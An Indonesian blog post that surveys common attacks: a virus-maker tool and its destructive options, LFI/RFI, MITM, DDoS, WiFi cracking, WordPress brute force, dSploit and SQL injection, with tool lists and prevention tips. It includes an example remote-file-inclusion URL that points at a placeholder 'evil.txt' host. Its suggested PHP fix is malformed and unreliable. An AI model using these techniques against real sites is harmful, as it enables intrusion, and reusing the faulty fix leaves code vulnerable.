Jenis jenis Serangan pada Komputer dan Jaringan

1) Virus Maker
Salah satu software yang digunakan adalah Terabit virus maker 2.8 SE, dibuat pada bulan September tahun 2007 di Iran. Virus ini dapat menyerang windows XP. Aplikasi ini akan terdeteksi oleh sebuah antivirus dengan nama virus: Backdoor.Win32.VB.bna
Terabit Virus Maker 2.8 ini berfungsi untuk membuat virus dengan kemampuan yang bisa kita pilih sendiri sehingga user bisa memakai dengan mudah.
Kegunaan :

  Mematikan monitor
 Tidak ada suara dalam volume
 Stop SQL Server
 Always log off
 Delete all file in desktop
 Delete windows fonts
 Disible printer
 Disible regedit
 Disible windows firewall
 Mengclose sendiri IE dalam 10 menit, dll

2)Local File Inclusion(LFI) dan Remote File Inclusion(RFI)
LFI (Local File Inclusion) adalah celah pada situs dimana attacker bisa mengakses semua file di dalam server dengan hanya melalui URL.
RFI (Remote File Inclusion) adalah celah dimana site mengizinkan attacker mengincludekan file dari luar server.
Cara Pencegahan :
·    Memvalidasi variable.
· Mengkonfigurasi kembali settingan php pada server website anda.
·  Pada include mungkin bisa ditambahkan “./”
jadinya seperti ini,
Code:
include(“./”$_GET[imagefile].”.php”);
Maksudnya dengan seperti itu, saat kita mengakses file dari luar server maka hasilnya akan error karena saat pemrosesan setiap file yang masuk ke variable page akan ditambah ./ di depannya.
http://www.[target].com/index.php?imagefile=http://www.[remote].com/evil.txt

Dengan seperti ini server atau website yang diinject akan mencari file http://www.[remote].com/evil.txt dan pastinya akan menyebabkan server menampilkan error bahwa tidak ditemukannya file tsb.

3)Man In The Middle (MITM)
Serangan Man in The Middle merupakan suatu tipe serangan yang memanfaatkan kelemahan Internet Protocol. Serangan ini dikategorikan sebagai serangan berbahaya karena menyerang berbagai media informasi seperti web, handphone, dst.
Konsep dari serangan ini penyerang berada di tengah-tengah antara 2 komputer yang saling berkomunikasi. Hal ini memungkinkan bagi penyerang untuk mengubah, melihat, dan mengontrol data yang dikirim dari kedua komputer yang saling berkomunikasi itu. Secara fisik penyerang tidak harus diantara 2 komputer, tapi rute paket yang ditujukan bagi host lain harus melalui mesin penyerang.
Jenis-jenis serangan MITM:
·Sniffer adalah aktifitas menyadap yang di lakukan dalam jaringan yang sangat sulit untuk di cegah, walaupun kita telah menginstall berbagai macam software untuk mencegah serangan dalam jaringan.
·Spoofing adalah situasi di mana seseorang berhasil menyamar sebagai user  dengan memalsukan data dan dengan demikian mendapatkan keuntungan tidak sah.
·Fabrication adalah menambahkan objek atau informasi palsu pada informasi yang asli, sehingga data atau informasi berubah.
·Interception adalah  ancaman terhadap secrecy dimana orang yang tidak berhak namun berhasil mendapatkan akses informasi dari dalam sistem komputer.
·Modification adalah ancaman terhadap integrity dimana orang yang tidak berhak dapat mengakses maupun merubah suatu informasi.

Alternatif Pencegahan Serangan MITM:
1. Memahami authentification dan authorization
2.Menggunakan pro VPN, agar memiliki tingkat keamanan yg tinggi.

4) DDos Attack
DDoS Attack merupakan serangan yang dilakukan pada server dengan cara membanjiri server dengan request ping atau request lainnya dengan jumlah yang sangat banyak.
Gejala terkena DDos :
1.     Jumlah spam tiba-tiba meningkat
2.     Blog tidak bisa diakses
3.     Kinerja jaringan menurun, maka jaringan jadi lemot dan butuh waktu sangat lama mengakses blog/file
4.     Blog-blog tertentu tidak dapat diakses terus menerus
5.     Fitur tertentu pada sebuah website hilang
Cara Pencegahan : 
1. Jika menggunakan jasa hosting pihak ketiga
Teliti memilih penyedia hosting
Menjadi warga shared hosting yang baik
2. Jika mengelola server hosting kamu sendiri

Mengikuti perkembangan celah keamanan terbaru dari sistem operasi dan piranti lunak yang digunakan pada server hosting tersebut dan selalu patch secara teratur.

5)Cracking Password Wifi dengan WEP dan WPA

WEP adalah standart keamanan & enkripsi pertama yang digunakan pada wireless, suatu metoda pengamanan jaringan nirkabel, disebut juga dengan Shared Key Authentication.
Kelebihan WEP = 
1. susah di deteksi oleh metode brute force atttack karena passphrase nya adalah pergabungan antara angka dan huruf
Kelemahan WEP 
1. Masalah kunci yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.
2. WEP menggunakan kunci yang bersifat statis
3. Masalah initialization vector (IV) WEP
4. Masalah integritas pesan Cyclic Redundancy Check (CRC-32)

WPA (Wi-Fi Protected Access) adalah suatu sistem yang juga dapat diterapkan untuk mengamankan jaringan nirkabel, metoda pengamanan dengan WPA ini diciptakan untuk melengkapi dari sistem yamg sebelumnya, yaitu WEP
Kelemahan WPA sampai saat ini adalah proses kalkulasi enkripsi/dekripsi yang lebih lama dan data overhead yang lebih besar.

6)Brute Force
Brute force adalah tekhnik dimana attacker memaksa masuk ke halaman admin suatu website dengan memanfaatkan random password yang telah mereka kumpulkan.
Syarat Penggunaan Brute Force:
1. Diperlukan koneksi yang setabil,
2. Berhasil atau tidaknya memperoleh informasi username dan password, tergantung dari kreatifitas kita menambahkan wordlist pada brute force,
3. Pengembangan pada google dorknya untuk mencari wordpress yang vuln atau bermasalah.
Cara Menanggulangi Serangan Brute Force:
1.     Mengubah Directory Admin, dimana pada wordpress untuk login dapat mengakses directory admin/wp-admin/ dapat diganti dengan nama dir yang di kehendaki
2.     Menginstall Plugin
 Stealth Login
Plugin ini dan merubah url default wp-admin kita, maka jika ada yang mencoba untuk masuk ke halaman wp-admin akan di redirect ke halaman depan website (index.php)
 Lockdown WP AdminIni adalah plugin yang paling banyak di pakai, karena cendrung lebih simple, tinggal ganti url defaultnya saja. Ketika ada yang iseng mencoba masuk ke halaman wp-admin maka akan dibawa ke halaman page notfound
Login LockDown
plugin ini mencatat alamat IP dan timestamp dari setiap kegagalan login pada CMS Wordpress. Jika sudah melebihi jumlah kesalahan login yang sudah ditentukan maka IP akan di banned.Plugin ini untuk menghindari serangan attacker yang memanfaatkan metode " Brute Force Attack " yaitu serangan yang menebak password untuk login ke suatu website.

7) Menembus Celah Keamanan Wifi dengan Tools Disploit
Disploit membantu para IT Security untuk menembus atau menemukan celah keamanan di jaringan WiFi maupun LAN
Tools yang dibutuhkan :
      Smartphone Android harus memiliki ARM CPU
      OS Android minimal versi 2.3 atau Gingerbread
      Smartphone Android harus sudah di root
      BusyBox telah diinstal secara lengkap (full installed)
      Jaringan Wifi
      User Target
8) SQL Injection
SQL injection adalah salah satu jenis penyerangan yang mengizinkan user tidak sah (penyerang) untuk mengakses database server. Sebuah teknik dimana dengan menggunakan atau menyalahgunakan sebuah celah keamanan yang terjadi dalam lapisan basis data sebuah aplikasi maupun web server.
Jadi, SQL Injection merupakan jenis aksi hacking pada keamanan komputer di mana seorang penyerang/attacker bisa mendapatkan akses ke basis data di dalam sistem (Sistem Utama)
3 jenis SQL Injection yang sering ditemui :
      Error Based SQL Injection dalam aksinya akan memberikan sebuah perintah ke database sehingga menampilkan pesan error.
      Union Based SQL Injection adalah metode SQL Injection perintah UNION untuk menggabungkan hasil dari dua atau lebih perintah SSELECT menjadi sebuah hasil tunggal.
      Blind SQL Injection, jenis ini tidak menampilkan pesan error dan tidak menampilkan data atau informasi yang ada, terkadang sedikit sulit untuk melakukan eksploitasi untuk jenis Blind SQL Injection. 
Mengapa bisa terjadi SQL Injection?
• Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
 Penggunaan pesan error yang masih bersifat default -- mudah untuk melacak query yang digunakan.
Bahaya SQL Injection :
Memungkinkan seseorang dapat login ke dalam sistem tanpa harus memiliki account.
Memungkinkan seseorang mengubah, menghapus, maupun menambahkan data–data yang berada di dalam database.
Dapat mematikan database dari suatu aplikasi, sehingga tidak bisa memberi layanan kepada web server.
Berikut beberapa tools yang digunakan pada praktek SQL Injection :
1.     BSQL Hacker
2.     The Mole
3.     Pangolin
4.     SQLMap
5.      Enema SQLi
6.     SQL Ninja
7.     SQL Sus
8.     Safe SQL Injector
9.     SQL Poizon

Hacking tidak ada yg instants dan bisa berhasil dengan mudah, Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba adalah pemenangnya. Dan gunakanlah metode hacking dengan niat yang baik untuk kebaikan orang banyak, jangan digunakan untuk kejahatan ya! Salam pembaca











Share this:

ABOUT THE AUTHOR

Sekecil apapun ilmu yang kita punya alangkah indahnya bila bermanfaat bagi sesama :)

0 komentar:

Posting Komentar